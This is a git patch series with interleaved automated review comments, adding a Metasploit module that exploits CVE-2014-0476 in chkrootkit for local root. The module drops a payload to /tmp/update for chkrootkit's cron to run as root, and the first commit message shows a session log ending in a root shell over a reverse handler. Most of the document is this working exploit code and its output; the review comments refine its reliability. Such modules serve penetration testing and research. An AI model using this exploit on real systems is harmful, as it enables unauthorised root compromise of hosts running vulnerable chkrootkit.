From 3566b978c3f2e46e3047df251a3a32c4485e4ba3 Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Fri, 6 Nov 2015 20:50:29 +0100
Subject: [PATCH 1/5] Add a module for a chkrootkit-powered privsec

This modules implements an exploit for CVE-2014-0476, to gain root thanks to chkrootkit. Its main issues is that you need to wait until chkrootkit is executed in a crontab (or manually), which can take 24h top with its default setup.

How to reproduce:
1. Install a version < 0.50 of chkrootkit
2. Launch the local module
3. Wait until chkrootkit's crontab kicks in
4. You've got a root shell

```
msf > use exploit/linux/local/chkrootkit
msf exploit(chkrootkit) > check
[*] 192.168.1.25 - The target appears to be vulnerable.
msf exploit(chkrootkit) > run
[*] Exploit completed, but no session was created.
[*] Started reverse handler on 192.168.1.11:9999
msf exploit(chkrootkit) >
[+] Target is vulnerable.
[!] Rooting depends of the crontab, this could take a while.
[*] Payload written to /tmp/update
[*] Waiting to chkrookit to be run be a cron tab...
[*] Command shell session 6 opened (192.168.1.11:9999 -> 192.168.1.25:40006) at 2015-11-06 20:53:00 +0100
[+] Deleted /tmp/update
msf exploit(chkrootkit) > sessions -i 6
[*] Starting interaction with 6...
id
uid=0(root) gid=0(root) groups=0(root)
```
---
 modules/exploits/linux/local/chkrootkit.rb | 78 ++++++++++++++++++++++
 1 file changed, 78 insertions(+)
 create mode 100644 modules/exploits/linux/local/chkrootkit.rb

diff --git a/modules/exploits/linux/local/chkrootkit.rb b/modules/exploits/linux/local/chkrootkit.rb
new file mode 100644
index 0000000000..9354bddda0
--- /dev/null
+++ b/modules/exploits/linux/local/chkrootkit.rb
@@ -0,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit4 < Msf::Exploit::Local
+  # This could also be excellent, but since it requires
+  # up to one day to pop a shell, lets set it to Manual instead.
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  include Msf::Exploit::Local::Linux
+
+  def initialize(info={})
+    super( update_info( info, {
+      'Name' => 'Chkrootkit 0.49 Local Privilege Escalation',
+      'Description' => %q{
+        Chkrootkit before 0.50 will run as root any executable file named
+        /tmp/updater, allowing a trivial privsec.
+
+        WfsDelay is set to 24h by default, since this is how often a chkrootkit
+        scan is scheduled by default.
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [
+        'Thomas Stangner', # original exploit
+        'Julien (jvoisin) Voisin' # metasploit module
+      ],
+      'Platform' => %w{ bsd linux unix solaris osx},
+      'SessionTypes' => [ 'shell', 'meterpreter' ],
+      'References' =>
+        [
+          [ 'BID', '67813' ],
+          [ 'CVE', '2014-0476' ],
+          [ 'CWE', '20' ],
+          [ 'EDB', '33899' ],
+          [ 'OSVDB', '107710' ],
+          [ 'URL', 'http://seclists.org/oss-sec/2014/q2/430' ],
+        ],
+      'DisclosureDate' => "Jun 28 2014",
+      'Arch' => ARCH_CMD,
+      'DefaultOptions' => { 'WfsDelay' => 60*3600*24 },
+      'Privileged' => true,
+      'Targets' =>
+        [
+          [ 'Generic', {} ],
+        ],
+      'Stance' => Msf::Exploit::Stance::Passive,
+      'DefaultTarget' => 0,}))
+  end
+
+  def check
+    res = cmd_exec('/usr/sbin/chkrootkit -V')
+    return Exploit::CheckCode::Appears if res && res =~ /chkrootkit version 0\.[^5]/
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    else
+      print_good("Target is vulnerable.")
+    end
+
+    print_warning('Rooting depends of the crontab, this could take a while.')
+
+    write_file("/tmp/update", "#!/bin/sh\n#{payload.encoded}\n")
+    cmd_exec("chmod +x /tmp/update")
+
+    print_status 'Payload written to /tmp/update'
+    print_status 'Waiting to chkrookit to be run be a cron tab...'
+
+    register_file_for_cleanup('/tmp/update')
+  end
+end
+

From 873994a154849804750fb5a3a83bf7c3dc238606 Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Fri, 13 Nov 2015 12:40:34 +0100
Subject: [PATCH 2/5] Skip the explicit return

Thanks to kernelsmith for the feedback
---
 modules/exploits/linux/local/chkrootkit.rb | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/linux/local/chkrootkit.rb b/modules/exploits/linux/local/chkrootkit.rb
index 9354bddda0..50d4851514 100644
--- a/modules/exploits/linux/local/chkrootkit.rb
+++ b/modules/exploits/linux/local/chkrootkit.rb
@@ -53,8 +53,11 @@ class Metasploit4 < Msf::Exploit::Local
 
   def check
     res = cmd_exec('/usr/sbin/chkrootkit -V')
-    return Exploit::CheckCode::Appears if res && res =~ /chkrootkit version 0\.[^5]/
-    return Exploit::CheckCode::Safe
+    if res && res =~ /chkrootkit version 0\.[^5]/
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
   end
 
   def exploit

From 70407a4f21856284a2dc2cd4c6bdd2ddaf066bd0 Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Mon, 16 Nov 2015 23:18:02 +0100
Subject: [PATCH 3/5] 3600 * 60 * 24 isn't one day

---
 modules/exploits/linux/local/chkrootkit.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/linux/local/chkrootkit.rb b/modules/exploits/linux/local/chkrootkit.rb
index 50d4851514..1d150f26b4 100644
--- a/modules/exploits/linux/local/chkrootkit.rb
+++ b/modules/exploits/linux/local/chkrootkit.rb
@@ -41,7 +41,7 @@ class Metasploit4 < Msf::Exploit::Local
         ],
       'DisclosureDate' => "Jun 28 2014",
       'Arch' => ARCH_CMD,
-      'DefaultOptions' => { 'WfsDelay' => 60*3600*24 },
+      'DefaultOptions' => { 'WfsDelay' => 60*60*24 },
       'Privileged' => true,
       'Targets' =>
         [

From 44d477a13c4b8f07eff8e7d82aae306a5fb93793 Mon Sep 17 00:00:00 2001
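Review bot: In `exploit`, the results of `write_file("/tmp/update", ...)` and the following `cmd_exec("chmod +x /tmp/update")` are ignored, so a drop that fails (a pre-existing `/tmp/update` owned by another user is the obvious case, since `/tmp` is shared) is still announced as 'Payload written' and the module then waits out the full 24h WfsDelay for a session that cannot arrive. Checking the write before announcing it, `fail_with(Failure::Unknown, 'Could not write /tmp/update') unless write_file(...)`, surfaces the failure immediately; write_file appears to report failure through its return value for the session types listed here, but that is worth confirming against Msf::Post::File. The same unchecked drop survives into the rewritten module in the last hunk of this series (modules/exploits/unix/local/chkrootkit.rb). Separately, the Description text names `/tmp/updater` while the code writes and registers `/tmp/update`; the two should agree.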
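Review bot: The version match kept in the restructured `check`, `/chkrootkit version 0\.[^5]/`, reports every 0.x release other than 0.5x as Appears, which is wider than the advisory's "before 0.50": a later 0.6 or higher, should one ever ship, would be flagged vulnerable. Bounding the digit class to the affected range keeps the check honest, `if res && res =~ /chkrootkit version 0\.[0-4]/`. `check` is complete within the hunk; the `exploit` method that follows is cut off by it.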
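Review bot: The corrected `60*60*24` on the `'DefaultOptions'` line is now right but remains an unexplained product, and the Description two screens up is the only place that says why a day was chosen. A trailing comment keeps the value and its rationale together: `'DefaultOptions' => { 'WfsDelay' => 60*60*24 }, # seconds; one day, the default chkrootkit cron interval`. `initialize` starts and ends outside this hunk.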
From: jvoisin
Date: Tue, 17 Nov 2015 13:26:50 +0100
Subject: [PATCH 4/5] Fix some rubocop warnings

---
 modules/exploits/linux/local/chkrootkit.rb | 26 +++++++++-------------
 1 file changed, 11 insertions(+), 15 deletions(-)

diff --git a/modules/exploits/linux/local/chkrootkit.rb b/modules/exploits/linux/local/chkrootkit.rb
index 1d150f26b4..920ef932a4 100644
--- a/modules/exploits/linux/local/chkrootkit.rb
+++ b/modules/exploits/linux/local/chkrootkit.rb
@@ -13,22 +13,22 @@ class Metasploit4 < Msf::Exploit::Local
 
   include Msf::Exploit::Local::Linux
 
-  def initialize(info={})
-    super( update_info( info, {
+  def initialize(info = {})
+    super(update_info(info, {
       'Name' => 'Chkrootkit 0.49 Local Privilege Escalation',
-      'Description' => %q{
+      'Description' => %q(
         Chkrootkit before 0.50 will run as root any executable file named
         /tmp/updater, allowing a trivial privsec.
 
         WfsDelay is set to 24h by default, since this is how often a chkrootkit
         scan is scheduled by default.
-      },
+      ),
       'License' => MSF_LICENSE,
       'Author' => [
         'Thomas Stangner', # original exploit
         'Julien (jvoisin) Voisin' # metasploit module
       ],
-      'Platform' => %w{ bsd linux unix solaris osx},
+      'Platform' => %w( bsd linux unix solaris osx),
       'SessionTypes' => [ 'shell', 'meterpreter' ],
       'References' =>
         [
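Review bot: The rewritten `'Platform'` line still advertises bsd, unix, solaris and osx while the class mixes in `Msf::Exploit::Local::Linux` (context line at the top of this hunk) and `check`, outside the hunk, hard-codes `/usr/sbin/chkrootkit`; either narrow the platform list to what the Linux mixin actually supports or drop the Linux-specific mixin, so the metadata does not promise platforms the code has not been exercised on. On style, swapping `%q{ ... }` for `%q( ... )` on the Description only to satisfy a cop sets a trap for later edits, since an unbalanced parenthesis in the prose would then break the literal; I would keep `'Description' => %q{` and configure the cop instead. `initialize` continues past the end of the hunk.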
@@ -37,26 +37,23 @@ class Metasploit4 < Msf::Exploit::Local
           [ 'CWE', '20' ],
           [ 'EDB', '33899' ],
           [ 'OSVDB', '107710' ],
-          [ 'URL', 'http://seclists.org/oss-sec/2014/q2/430' ],
+          [ 'URL', 'http://seclists.org/oss-sec/2014/q2/430' ]
         ],
       'DisclosureDate' => "Jun 28 2014",
       'Arch' => ARCH_CMD,
-      'DefaultOptions' => { 'WfsDelay' => 60*60*24 },
+      'DefaultOptions' => { 'WfsDelay' => 60 * 60 * 24 },
       'Privileged' => true,
-      'Targets' =>
-        [
-          [ 'Generic', {} ],
-        ],
+      'Targets' => [[ 'Generic', {} ]],
       'Stance' => Msf::Exploit::Stance::Passive,
-      'DefaultTarget' => 0,}))
+      'DefaultTarget' => 0 }))
   end
 
   def check
     res = cmd_exec('/usr/sbin/chkrootkit -V')
     if res && res =~ /chkrootkit version 0\.[^5]/
-      Exploit::CheckCode::Appears
+      Exploit::CheckCode::Appears
     else
-      Exploit::CheckCode::Safe
+      Exploit::CheckCode::Safe
     end
   end
 
@@ -78,4 +75,3 @@ class Metasploit4 < Msf::Exploit::Local
     register_file_for_cleanup('/tmp/update')
   end
 end
-

From 657e50bb867120f5650ca85a985c9f541550f262 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Wed, 18 Nov 2015 10:35:11 -0600
Subject: [PATCH 5/5] Clean up module

---
 modules/exploits/linux/local/chkrootkit.rb | 77 ----------------------------
 modules/exploits/unix/local/chkrootkit.rb | 75 +++++++++++++++++++++++++++
 2 files changed, 75 insertions(+), 77 deletions(-)
 delete mode 100644 modules/exploits/linux/local/chkrootkit.rb
 create mode 100644 modules/exploits/unix/local/chkrootkit.rb

diff --git a/modules/exploits/linux/local/chkrootkit.rb b/modules/exploits/linux/local/chkrootkit.rb
deleted file mode 100644
index 920ef932a4..0000000000
--- a/modules/exploits/linux/local/chkrootkit.rb
+++ /dev/null
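Review bot: `check` still runs a hard-coded `/usr/sbin/chkrootkit -V` (context line in this hunk), so on a host where chkrootkit is installed elsewhere the command fails, `res` is empty, and the module answers Safe for an install that is in fact affected. Registering a path option in `initialize`, an `OptString` such as `CHKROOTKIT` defaulting to `/usr/sbin/chkrootkit`, and using it here, `res = cmd_exec("#{datastore['CHKROOTKIT']} -V")`, lets the operator point the check at the real binary. The re-indented `Exploit::CheckCode::Appears`/`Safe` lines and the trailing-blank-line hunk below are fine as they are.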
@@ -1,77 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class Metasploit4 < Msf::Exploit::Local
-  # This could also be excellent, but since it requires
-  # up to one day to pop a shell, lets set it to Manual instead.
-  Rank = ManualRanking
-
-  include Msf::Post::File
-  include Msf::Exploit::FileDropper
-
-  include Msf::Exploit::Local::Linux
-
-  def initialize(info = {})
-    super(update_info(info, {
-      'Name' => 'Chkrootkit 0.49 Local Privilege Escalation',
-      'Description' => %q(
-        Chkrootkit before 0.50 will run as root any executable file named
-        /tmp/updater, allowing a trivial privsec.
-
-        WfsDelay is set to 24h by default, since this is how often a chkrootkit
-        scan is scheduled by default.
-      ),
-      'License' => MSF_LICENSE,
-      'Author' => [
-        'Thomas Stangner', # original exploit
-        'Julien (jvoisin) Voisin' # metasploit module
-      ],
-      'Platform' => %w( bsd linux unix solaris osx),
-      'SessionTypes' => [ 'shell', 'meterpreter' ],
-      'References' =>
-        [
-          [ 'BID', '67813' ],
-          [ 'CVE', '2014-0476' ],
-          [ 'CWE', '20' ],
-          [ 'EDB', '33899' ],
-          [ 'OSVDB', '107710' ],
-          [ 'URL', 'http://seclists.org/oss-sec/2014/q2/430' ]
-        ],
-      'DisclosureDate' => "Jun 28 2014",
-      'Arch' => ARCH_CMD,
-      'DefaultOptions' => { 'WfsDelay' => 60 * 60 * 24 },
-      'Privileged' => true,
-      'Targets' => [[ 'Generic', {} ]],
-      'Stance' => Msf::Exploit::Stance::Passive,
-      'DefaultTarget' => 0 }))
-  end
-
-  def check
-    res = cmd_exec('/usr/sbin/chkrootkit -V')
-    if res && res =~ /chkrootkit version 0\.[^5]/
-      Exploit::CheckCode::Appears
-    else
-      Exploit::CheckCode::Safe
-    end
-  end
-
-  def exploit
-    if check == Exploit::CheckCode::Safe
-      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
-    else
-      print_good("Target is vulnerable.")
-    end
-
-    print_warning('Rooting depends of the crontab, this could take a while.')
-
-    write_file("/tmp/update", "#!/bin/sh\n#{payload.encoded}\n")
-    cmd_exec("chmod +x /tmp/update")
-
-    print_status 'Payload written to /tmp/update'
-    print_status 'Waiting to chkrookit to be run be a cron tab...'
-
-    register_file_for_cleanup('/tmp/update')
-  end
-end
diff --git a/modules/exploits/unix/local/chkrootkit.rb b/modules/exploits/unix/local/chkrootkit.rb
new file mode 100644
index 0000000000..1c7b5c64a6
--- /dev/null
+++ b/modules/exploits/unix/local/chkrootkit.rb
@@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit4 < Msf::Exploit::Local
+
+  # This could also be Excellent, but since it requires
+  # up to one day to pop a shell, let's set it to Manual instead.
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Chkrootkit Local Privilege Escalation',
+      'Description' => %q{
+        Chkrootkit before 0.50 will run any executable file named
+        /tmp/update as root, allowing a trivial privsec.
+
+        WfsDelay is set to 24h, since this is how often a chkrootkit
+        scan is scheduled by default.
+      },
+      'Author' => [
+        'Thomas Stangner', # Original exploit
+        'Julien "jvoisin" Voisin' # Metasploit module
+      ],
+      'References' => [
+        ['CVE', '2014-0476'],
+        ['OSVDB', '107710'],
+        ['EDB', '33899'],
+        ['BID', '67813'],
+        ['CWE', '20'],
+        ['URL', 'http://seclists.org/oss-sec/2014/q2/430']
+      ],
+      'DisclosureDate' => 'Jun 04 2014',
+      'License' => MSF_LICENSE,
+      'Platform' => 'unix',
+      'Arch' => ARCH_CMD,
+      'SessionTypes' => ['shell', 'meterpreter'],
+      'Privileged' => true,
+      'Stance' => Msf::Exploit::Stance::Passive,
+      'Targets' => [['Automatic', {}]],
+      'DefaultTarget' => 0,
+      'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
+    ))
+
+    register_options([
+      OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
+    ])
+  end
+
+  def check
+    version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")
+
+    if version =~ /chkrootkit version 0\.[1-4]/
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_warning('Rooting depends on the crontab (this could take a while)')
+
+    write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
+    cmd_exec('chmod +x /tmp/update')
+    register_file_for_cleanup('/tmp/update')
+
+    print_status('Payload written to /tmp/update')
+    print_status('Waiting for chkrootkit to run via cron...')
+  end
+
+end
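Review bot: `exploit` in the new module no longer consults `check` before dropping `/tmp/update`, unlike the module it replaces, so against a host where chkrootkit is absent or already 0.50+ it still writes the file, registers it for cleanup and then sits out the full 24h WfsDelay; a guard at the top of `exploit`, `fail_with(Failure::NotVulnerable, 'Target is not vulnerable') if check == Exploit::CheckCode::Safe`, restores the early exit. In `check`, `datastore['CHKROOTKIT']` is interpolated unquoted into the shell command, so a path containing a space or shell metacharacter is split or misparsed; quoting it, e.g. `cmd_exec("#{Shellwords.escape(datastore['CHKROOTKIT'])} -V 2>&1")`, is safer (shellwords is stdlib, but confirm it is already loaded in the framework before relying on it). The return value of `write_file` is still unchecked here, as raised on the first hunk of this series. Finally, "privsec" in the Description should read "privesc".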